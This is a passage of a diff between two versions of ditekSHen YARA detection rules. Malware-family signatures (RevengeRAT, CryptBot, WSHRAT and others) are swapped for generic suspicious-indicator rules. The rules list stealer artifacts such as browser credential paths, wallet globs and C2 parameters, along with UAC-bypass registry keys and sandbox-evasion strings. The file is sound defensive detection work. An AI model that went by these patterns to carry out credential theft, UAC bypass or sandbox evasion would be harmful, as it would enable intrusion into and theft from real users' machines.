+		quality = 45
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "OpenClipboard" fullword ascii
-		$s2 = "SendARP" fullword ascii
-		$s3 = "GetWebRequest" fullword ascii
-		$s4 = "DotNetGuard" fullword ascii
-		$s5 = "set_CreateNoWindow" fullword ascii
-		$s6 = "UploadFile" fullword ascii
-		$s7 = "GetHINSTANCE" fullword ascii
-		$s8 = "Kill" fullword ascii
-		$s9 = "GetProcesses" fullword ascii
-		$s10 = "get_PrimaryScreen" fullword ascii
+		$s1 = "Modified by an unpaid evaluation copy of Resource Tuner 2 (www.heaventools.com)" fullword wide
 
 	condition:
 		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Osno : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_References_Sectools_B64Encoded : FILE
 {
 	meta:
-		description = "Osno ransomware and infostealer payload"
+		description = "Detects executables referencing many base64-encoded IR and analysis tools names"
 		author = "ditekSHen"
-		id = "25ed5ad4-804a-5608-b6fe-a811ca6744d8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2d3c994a-5b7c-52c5-a4a1-e67a773b692b"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1617-L1652"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L897-L941"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3df59c306017001467a5f237db2ab37d97c34116558e18420a6a1f01f08f520f"
-		score = 75
-		quality = 73
+		logic_hash = "20f889c9c50e8c5e55fd7ebe508015b1e72e6f7ef1b410e5e707d554fb8e8588"
+		score = 40
+		quality = 43
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = ".HolyGate+<>c+<<FinalBoss>" ascii
-		$s2 = /Osno(Keylogger|Stealer|Ransom)/ wide
-		$s3 = "password,executeWebhook('Account credentials" wide
-		$s4 = "-Name Osno -PropertyType" wide
-		$s5 = "process.env.hook" ascii
-		$s6 = "Stealer.JSON.JsonValue" ascii
-		$s7 = "<DetectBrowserss>b_" ascii
-		$s8 = "<TryGetDiscordPath>b_" ascii
-		$s9 = "antiVM" fullword ascii
-		$s10 = "downloadurl" fullword ascii
-		$s11 = "set_sPassword" fullword ascii
-		$txt0 = "{0} {1} .txt" fullword wide
-		$txt1 = "\\ScanningNetworks.txt" fullword wide
-		$txt2 = "\\SteamApps.txt" fullword wide
-		$txt3 = "-ErrorsLogs.txt" fullword wide
-		$txt4 = "-keylogs.txt" fullword wide
-		$txt5 = "Hardware & Soft.txt" fullword wide
-		$cnc0 = "/csharp/" ascii wide
-		$cnc1 = "token=" ascii wide
-		$cnc2 = "&timestamp=" ascii wide
-		$cnc3 = "&session_id=" ascii wide
-		$cnc4 = "&aid=" ascii wide
-		$cnc5 = "&secret=" ascii wide
-		$cnc6 = "&api_key" ascii wide
-		$cnc7 = "&session_key=" ascii wide
-		$cnc8 = "&type=" ascii wide
+		$s1 = "VGFza21ncg==" ascii wide
+		$s2 = "dGFza21ncg==" ascii wide
+		$s3 = "UHJvY2Vzc0hhY2tlcg" ascii wide
+		$s4 = "cHJvY2V4cA" ascii wide
+		$s5 = "cHJvY2V4cDY0" ascii wide
+		$s6 = "aHR0cCBhbmFseXplci" ascii wide
+		$s7 = "ZmlkZGxlcg" ascii wide
+		$s8 = "ZWZmZXRlY2ggaHR0cCBzbmlmZmVy" ascii wide
+		$s9 = "ZmlyZXNoZWVw" ascii wide
+		$s10 = "SUVXYXRjaCBQcm9mZXNzaW9uYWw" ascii wide
+		$s11 = "ZHVtcGNhcA" ascii wide
+		$s12 = "d2lyZXNoYXJr" ascii wide
+		$s13 = "c3lzaW50ZXJuYWxzIHRjcHZpZXc" ascii wide
+		$s14 = "TmV0d29ya01pbmVy" ascii wide
+		$s15 = "TmV0d29ya1RyYWZmaWNWaWV3" ascii wide
+		$s16 = "SFRUUE5ldHdvcmtTbmlmZmVy" ascii wide
+		$s17 = "dGNwZHVtcA" ascii wide
+		$s18 = "aW50ZXJjZXB0ZXI" ascii wide
+		$s19 = "SW50ZXJjZXB0ZXItTkc" ascii wide
+		$s20 = "b2xseWRiZw" ascii wide
+		$s21 = "eDY0ZGJn" ascii wide
+		$s22 = "eDMyZGJn" ascii wide
+		$s23 = "ZG5zcHk" ascii wide
+		$s24 = "ZGU0ZG90" ascii wide
+		$s25 = "aWxzcHk" ascii wide
+		$s26 = "ZG90cGVla" ascii wide
+		$s27 = "aWRhNjQ" ascii wide
+		$s28 = "UkRHIFBhY2tlciBEZXRlY3Rvcg" ascii wide
+		$s29 = "Q0ZGIEV4cGxvcmVy" ascii wide
+		$s30 = "UEVpRA" ascii wide
+		$s31 = "cHJvdGVjdGlvbl9pZA" ascii wide
+		$s32 = "TG9yZFBF" ascii wide
+		$s33 = "cGUtc2lldmU=" ascii wide
+		$s34 = "TWVnYUR1bXBlcg" ascii wide
+		$s35 = "VW5Db25mdXNlckV4" ascii wide
+		$s36 = "VW5pdmVyc2FsX0ZpeGVy" ascii wide
+		$s37 = "Tm9GdXNlckV4" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 4 of ( $txt* ) or ( 4 of ( $s* ) and 2 of ( $txt* ) ) ) ) or ( 7 of ( $cnc* ) )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Betabot : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_References_Sandbox_Artifacts : FILE
 {
 	meta:
-		description = "BetaBot payload"
+		description = "Detects executables referencing sandbox artifacts"
 		author = "ditekSHen"
-		id = "377c500c-5727-5bea-ac46-cb69c868a607"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2c0e4d38-8d68-5cd2-9f9e-e56f372b67cf"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1654-L1666"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L943-L976"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e594d01874ee622169d6708ddc6cfde7f1d26d2bea1604961dc860700e8a1d5d"
-		score = 75
-		quality = 73
+		logic_hash = "3d4a356191ec914eba86e78d3823dd1dc2d18f17074abb9986f3337169821bc6"
+		score = 40
+		quality = 43
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "__restart" fullword ascii
-		$s2 = "%SystemRoot%\\SysWOW64\\tapi3.dll" fullword wide
-		$s3 = "%SystemRoot%\\system32\\tapi3.dll" fullword wide
-		$s4 = "publicKeyToken=\"6595b64144ccf1df\"" ascii
-		$s5 = "VirtualProtectEx" fullword ascii
+		$s1 = "C:\\agent\\agent.pyw" ascii wide
+		$s2 = "C:\\sandbox\\starter.exe" ascii wide
+		$s3 = "c:\\ipf\\BDCore_U.dll" ascii wide
+		$s4 = "C:\\cwsandbox_manager" ascii wide
+		$s5 = "C:\\cwsandbox" ascii wide
+		$s6 = "C:\\Stuff\\odbg110" ascii wide
+		$s7 = "C:\\gfisandbox" ascii wide
+		$s8 = "C:\\Virus Analysis" ascii wide
+		$s9 = "C:\\iDEFENSE\\SysAnalyzer" ascii wide
+		$s10 = "c:\\gnu\\bin" ascii wide
+		$s11 = "C:\\SandCastle\\tools" ascii wide
+		$s12 = "C:\\cuckoo\\dll" ascii wide
+		$s13 = "C:\\MDS\\WinDump.exe" ascii wide
+		$s14 = "C:\\tsl\\Raptorclient.exe" ascii wide
+		$s15 = "C:\\guest_tools\\start.bat" ascii wide
+		$s16 = "C:\\tools\\aswsnx\\snxcmd.exe" ascii wide
+		$s17 = "C:\\Winap\\ckmon.pyw" ascii wide
+		$s18 = "c:\\tools\\decodezeus" ascii wide
+		$s19 = "c:\\tools\\aswsnx" ascii wide
+		$s20 = "C:\\sandbox\\starter.exe" ascii wide
+		$s21 = "C:\\Kit\\procexp.exe" ascii wide
+		$s22 = "c:\\tracer\\mdare32_0.sys" ascii wide
+		$s23 = "C:\\tool\\malmon" ascii wide
+		$s24 = "C:\\Samples\\102114\\Completed" ascii wide
+		$s25 = "c:\\vmremote\\VmRemoteGuest.exe" ascii wide
+		$s26 = "d:\\sandbox_svc.exe" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule DITEKSHEN_MALWARE_Win_Wshratplugin : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Embedded_Gzip_B64Encoded_File : FILE
 {
 	meta:
-		description = "WSHRAT keylogger plugin payload"
+		description = "Detects executables containing bas64 encoded gzip files"
 		author = "ditekSHen"
-		id = "45c4fc87-6c45-5cd7-9fc4-7d3ea664a740"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e50f8560-d53b-5388-b94d-d104b7c064f2"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1668-L1685"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L978-L987"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3feeab43b58b533b7d2d41a71f2107e6f05b9c54ff805607843d253cadbe9384"
-		score = 75
-		quality = 75
+		logic_hash = "431e5a45bf8ed5874b330419675b3d43eb6a563c42873730e823cdd7d6efba97"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		snort_sid = "920010-920012"
-		clamav_sig = "MALWARE.Win.Trojan.WSHRAT-KLG"
+		importance = 20
 
 	strings:
-		$s1 = "GET /open-keylogger HTTP/1.1" fullword wide
-		$s2 = "KeyboardChange: nCode={0}, wParam={1}, vkCode={2}, scanCode={3}, flags={4}, dwExtraInfo={6}" wide
-		$s3 = "MouseChange: nCode={0}, wParam={1}, x={2}, y={3}, mouseData={4}, flags={5}, dwExtraInfo={7}" wide
-		$s4 = "sendKeyLog" fullword ascii
-		$s5 = "saveKeyLog" fullword ascii
-		$s6 = "get_TotalKeyboardClick" fullword ascii
-		$s7 = "get_SessionMouseClick" fullword ascii
-		$pdb = "\\Android\\documents\\visual studio 2010\\Projects\\Keylogger\\Keylogger\\obj\\x86\\Debug\\Keylogger.pdb" ascii
+		$s1 = "H4sIAAAAAAA" ascii wide
+		$s2 = "AAAAAAAIs4H" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Revengerat : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_PWSH_Passwordcredential_Retrievepassword
 {
 	meta:
-		description = "RevengeRAT and variants payload"
+		description = "Detects PowerShell content designed to retrieve passwords from host"
 		author = "ditekSHen"
-		id = "7d725050-108c-54b5-978e-2dd2124f5b0f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b34599ab-b874-5ea5-990d-bc7593bb08b5"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1687-L1713"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1048-L1058"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "be9e50052f45b94d5995db723dd64d16a91c5ba0d3f589c018155c0cce45124f"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		snort_sid = "920000-920002"
+		logic_hash = "f09320d9c4734579a535c7fee993fa076974b13ffd25e0d9ab02bc09663595f8"
+		score = 40
+		quality = 39
+		tags = ""
+		importance = 20
 
 	strings:
-		$l1 = "Lime.Connection" fullword ascii
-		$l2 = "Lime.Packets" fullword ascii
-		$l3 = "Lime.Settings" fullword ascii
-		$l4 = "Lime.NativeMethods" fullword ascii
-		$s1 = "GetAV" fullword ascii
-		$s2 = "keepAlivePing!" fullword ascii wide
-		$s3 = "Revenge-RAT" fullword ascii wide
-		$s4 = "*-]NK[-*" fullword ascii wide
-		$s5 = "RV_MUTEX" fullword ascii wide
-		$s6 = "set_SendBufferSize" fullword ascii
-		$s7 = "03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8" fullword ascii
-		$s8 = "5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41" fullword ascii
-		$s9 = "\\RevengeRAT\\" ascii
-		$q1 = "Select * from AntiVirusProduct" fullword ascii wide
-		$q2 = "SELECT * FROM FirewallProduct" fullword ascii wide
-		$q3 = "select * from Win32_Processor" fullword ascii wide
+		$namespace = "Windows.Security.Credentials.PasswordVault" ascii wide nocase
+		$method1 = "RetrieveAll()" ascii wide nocase
+		$method2 = ".RetrievePassword()" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $l* ) and 3 of ( $s* ) ) or ( all of ( $q* ) and 3 of ( $s* ) ) or 3 of ( $s* ) )
+		$namespace and 1 of ( $method* )
 }
-rule DITEKSHEN_MALWARE_Win_TRAT : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_Envvarscheduledtasks
 {
 	meta:
-		description = "TRAT payload"
+		description = "detects Windows exceutables potentially bypassing UAC (ab)using Environment Variables in Scheduled Tasks"
 		author = "ditekSHen"
-		id = "15f80970-6bc7-5e29-86d6-f7529a10d227"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "14244310-e524-54bf-8822-9b953378bb75"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1715-L1730"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1070-L1081"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b8474c74cd9f21fcb3a8ae1c7a7a0a801f0f117782e9803cdae39daf7f0f8b2f"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.TRAT"
+		logic_hash = "dacca794aefd66526535a87c8890c0ad65550ff88bc0242f05c84c9452a31fe2"
+		score = 40
+		quality = 45
+		tags = ""
+		importance = 20
 
 	strings:
-		$s1 = "^STEAM_0:[0-1]:([0-9]{1,10})$" fullword wide
-		$s2 = "^7656119([0-9]{10})$" fullword wide
-		$s3 = "Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)" ascii
-		$s4 = "\"schtasks\", \"/delete /tn UpdateWindows /f\");" ascii
-		$s5 = "ProcessWindowStyle.Hidden" ascii
-		$s6 = "+<>c+<<ListCommands>" ascii
-		$s7 = "//B //Nologo *Y" fullword ascii
+		$s1 = "\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup" ascii wide
+		$s2 = "\\Environment" ascii wide
+		$s3 = "schtasks" ascii wide
+		$s4 = "/v windir" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		all of them
 }
-rule DITEKSHEN_MALWARE_Win_Cryptbot : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_Fodhelper
 {
 	meta:
-		description = "CryptBot/Fugrafa stealer payload"
+		description = "detects Windows exceutables potentially bypassing UAC using fodhelper.exe"
 		author = "ditekSHen"
-		id = "248961dd-b98d-509b-92a0-1670b7687e25"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "0651e428-a2ef-508d-ad89-c68ac758808f"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1732-L1766"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1083-L1094"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6322b8b1ad210fac4475c194e060046538d4174f69a7c0e3618646d262cd33bd"
-		score = 75
-		quality = 69
-		tags = "FILE"
-		snort2_sid = "920110"
-		snort3_sid = "920108"
-		clamav_sig = "MALWARE.Win.Trojan.CryptBot"
+		logic_hash = "ec41ca2185732e418825f7c32095dea361a53e586e498baf4c17eaaf9602ba5e"
+		score = 40
+		quality = 43
+		tags = ""
+		importance = 20
 
 	strings:
-		$s1 = "Username: %wS" fullword wide
-		$s2 = "Computername: %wS" fullword wide
-		$s3 = "/c rd /s /q %" wide
-		$s4 = "IP: N0t_IP" fullword wide
-		$s5 = "Country: N0t_Country" fullword wide
-		$s6 = "password-check" fullword ascii
-		$s7 = "Content-Disposition: form-data; name=\"file\"; filename=\"" ascii wide
-		$s8 = "[ %wS ]" wide
-		$s9 = "EXE_PATH:" wide
-		$s10 = "Username (Computername):" wide
-		$s11 = "Operating system language:" wide
-		$s12 = "/index.php" wide
-		$f1 = "*ledger*.txt" fullword wide
-		$f2 = "*crypto*.xlsx" fullword wide
-		$f3 = "*private*.txt" fullword wide
-		$f4 = "*wallet*.dat" fullword wide
-		$f5 = "*pass*.txt" fullword wide
-		$f6 = "*bitcoin*.txt" fullword wide
-		$p1 = "%USERPROFILE%\\Desktop\\*.txt" fullword wide
-		$p2 = "%USERPROFILE%\\Desktop\\secret.txt" fullword wide
-		$p3 = "%USERPROFILE%\\Desktop\\report.doc" fullword wide
-		$pattern1 = /(files_|_Files)\\(_?)(cookies|cryptocurrency|forms|passwords|system_info|screenshot|screen_desktop|information|files|wallet|cc|Coinomi)\\?(\.txt|\.jpg|\.jpeg)?/ ascii wide nocase
-		$pattern2 = /%(s|ws)\\%(s|ws)\\(Login Data|Cookies|Web Data)/ fullword wide
-		$pattern3 = /(_AllPasswords_list.txt|_AllForms_list.txt|_AllCookies_list.txt|_All_CC_list.txt|_Information.txt|_Info.txt|_Screen_Desktop.jpeg)/ fullword wide
+		$s1 = "\\software\\classes\\ms-settings\\shell\\open\\command" ascii wide nocase
+		$s2 = "DelegateExecute" ascii wide
+		$s3 = "fodhelper" ascii wide
+		$s4 = "ConsentPromptBehaviorAdmin" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $s* ) and 1 of ( $p* ) ) or ( 4 of ( $s* ) and 1 of ( $f* ) and 1 of ( $p* ) ) or ( 2 of ( $pattern* ) and 3 of ( $s* ) ) or ( #pattern1 > 6 and ( 2 of ( $s* ) or 1 of ( $p* ) ) ) )
+		all of them
 }
-rule DITEKSHEN_MALWARE_Win_Matiex : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_Finger_Download_Pattern
 {
 	meta:
-		description = "Matiex/XetimaLogger keylogger payload"
+		description = "Detects files embedding and abusing the finger command for download"
 		author = "ditekSHen"
-		id = "61803e0c-8f6a-5ded-855a-ff26eed1384f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "6647b410-c8f0-596b-95d7-dbc6a951a83f"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1768-L1788"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1108-L1118"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "62b45c43d99bef93a6c0e72200b869fdce331f8fa325640df7d8b72af56a3ef2"
-		score = 75
-		quality = 73
-		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.MatiexKeylogger"
+		logic_hash = "04cbb1abc4c3d2990bae798ece052eb8aa1b5104b5712e98aeb80731316b9c57"
+		score = 40
+		quality = 20
+		tags = ""
+		importance = 20
 
 	strings:
-		$id = "--M-A-T-I-E-X--K-E-Y-L-O-G-E-R--" ascii wide
-		$s1 = "StartKeylogger" fullword ascii
-		$s2 = "_KeyboardLoggerTimer" ascii
-		$s3 = "_ScreenshotLoggerTimer" ascii
-		$s4 = "_VoiceRecordLogger" ascii
-		$s5 = "_ClipboardLoggerTimer" ascii
-		$s6 = "get_logins" fullword ascii
-		$s7 = "get_processhackerFucked" fullword ascii
-		$s8 = "_ThePSWDSenders" fullword ascii
-		$pdb = "\\Before FprmT\\Document VB project\\FireFox Stub\\FireFox Stub\\obj\\Debug\\VNXT.pdb" ascii
+		$pat1 = /finger(\.exe)?\s.{1,50}@.{7,10}\|/ ascii wide
+		$pat2 = "-Command \"finger" ascii wide
+		$ne1 = "Nmap service detection probe list" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $id or 4 of ( $s* ) or ( $pdb and 2 of them ) )
+		not any of ( $ne* ) and any of ( $pat* )
 }
-rule DITEKSHEN_MALWARE_Win_Iamthekingkeylogger : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_CMSTPCMD : FILE
 {
 	meta:
-		description = "IAmTheKing Keylogger payload"
+		description = "Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF"
 		author = "ditekSHen"
-		id = "f9c84241-6db2-5243-9bea-2165104cb0c3"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7bad57dc-ee8b-559d-8b17-af44c5bdf35b"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1790-L1805"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1120-L1133"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "80d8cabfd02cd73e19e6cf1c2a8a5f06c5b3b502fe4f07289e92b448425aaa6d"
-		score = 75
-		quality = 75
+		logic_hash = "4cb92224d5a520dbd42d00d053aba3da21a49fda9391e5a462fd292d2e87e884"
+		score = 40
+		quality = 41
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.IAmTheKingKeylogger"
+		importance = 20
 
 	strings:
-		$s1 = "[TIME:]%d/%d/%d %02d:%02d:%02d" fullword ascii
-		$s2 = "[TITLE:]" fullword ascii
-		$s3 = "%s-%02d-%02d-%02d-%02d" fullword ascii
-		$s4 = "[DATA]:" fullword ascii
-		$s5 = "[BK]" fullword ascii
-		$s6 = "Log.txt" fullword ascii
-		$s7 = "sonme hting is wrong x" fullword ascii
+		$s1 = "c:\\windows\\system32\\cmstp.exe" ascii wide nocase
+		$s2 = "taskkill /IM cmstp.exe /F" ascii wide nocase
+		$s3 = "CMSTPBypass" fullword ascii
+		$s4 = "CommandToExecute" fullword ascii
+		$s5 = "RunPreSetupCommands=RunPreSetupCommandsSection" fullword wide
+		$s6 = "\"HKLM\", \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\CMMGR32.EXE\", \"ProfileInstallPath\", \"%UnexpectedError%\", \"\"" fullword wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule DITEKSHEN_MALWARE_Win_Iamthekingscrcap : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_JS_WMI_Execquery
 {
 	meta:
-		description = "IAmTheKing screen capture payload"
+		description = "Detects JS potentially executing WMI queries"
 		author = "ditekSHen"
-		id = "ba385194-9578-568c-b908-bc4fc742e52e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "28f37b24-8bf3-5f5c-af47-dc6da5f6397a"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1807-L1821"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1135-L1147"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "594ddad4e08bad51f90de1c4299e28b4800b4fa686bd4176e406ba401a1242ba"
-		score = 75
-		quality = 75
-		tags = "FILE"
+		logic_hash = "e5145aa3a7ce54cda84929f6806a1d7b1cb37db729bb932c5c76994fb683250e"
+		score = 40
+		quality = 45
+		tags = ""
+		importance = 20
 
 	strings:
-		$s1 = "@MyScreen.jpg" fullword wide
-		$s2 = "DISPLAY" fullword wide
-		$s3 = ".?AVCImage@ATL@@" fullword ascii
-		$s4 = ".?AVGdiplusBase@Gdiplus@@" fullword ascii
-		$s5 = ".?AVImage@Gdiplus@@" fullword ascii
-		$s6 = ".?AVBitmap@Gdiplus@@" fullword ascii
-		$s7 = ".?AVCAtlException@ATL@@" fullword ascii
+		$ex = ".ExecQuery(" ascii nocase
+		$s1 = "GetObject(" ascii nocase
+		$s2 = "String.fromCharCode(" ascii nocase
+		$s3 = "ActiveXObject(" ascii nocase
+		$s4 = ".Sleep(" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		($ex and all of ( $s* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Iamthekingkingofhearts : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_XML_Liverpool_Downlaoder_Userconfig : FILE
 {
 	meta:
-		description = "IAmTheKing King Of Hearts payload"
+		description = "Detects XML files associated with 'Liverpool' downloader containing encoded executables"
 		author = "ditekSHen"
-		id = "95c73ec0-75b0-5d46-87da-b30feb170716"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b5840af5-a285-53f4-bac7-07821e740089"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1823-L1843"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1227-L1236"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "75b6dd0ebb90fd04f9e4a0b1fc6a1bbf417fc66daad24c8b01f0390f6155ec55"
-		score = 75
-		quality = 75
+		logic_hash = "8140c29eb54d8c8786b268d5241fcd221a5fb95433bc1038a7f23295afe8c9b8"
+		score = 40
+		quality = 45
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "write info fail!!! GetLastError-->%u" fullword ascii
-		$s2 = "LookupAccountSid Error %u" fullword ascii
-		$s3 = "CreateServiceErrorID:%d" fullword ascii
-		$s4 = "In ControlServiceErrorID:%d" fullword ascii
-		$s5 = "In QueryServiceStatus ErrorID:%d" fullword ascii
-		$s6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" fullword ascii
-		$s7 = "hello%s" fullword ascii
-		$s8 = "additional header failed..." fullword ascii
-		$s9 = "Set Option failed errcode: %ld" fullword ascii
-		$s10 = "add cookie failed..." fullword ascii
-		$u1 = "Mozilla/4.0 (compatible; )" fullword ascii
-		$u2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)" fullword ascii
+		$s1 = "<configSections>" ascii nocase
+		$s2 = "<value>77 90" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $u* ) and 4 of ( $s* ) ) or ( all of ( $u* ) and 3 of ( $s* ) ) or ( 5 of them ) )
+		uint32( 0 ) == 0x6d783f3c and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Cobaltstrike : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_B64_Encoded_Useragent : FILE
 {
 	meta:
-		description = "CobaltStrike payload"
+		description = "Detects executables containing base64 encoded User Agent"
 		author = "ditekSHen"
-		id = "140e16d0-0102-5650-a371-c95013d7f021"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e6a6eba2-587f-5b6b-b23d-4e4aa5289d1d"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1845-L1864"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1238-L1247"
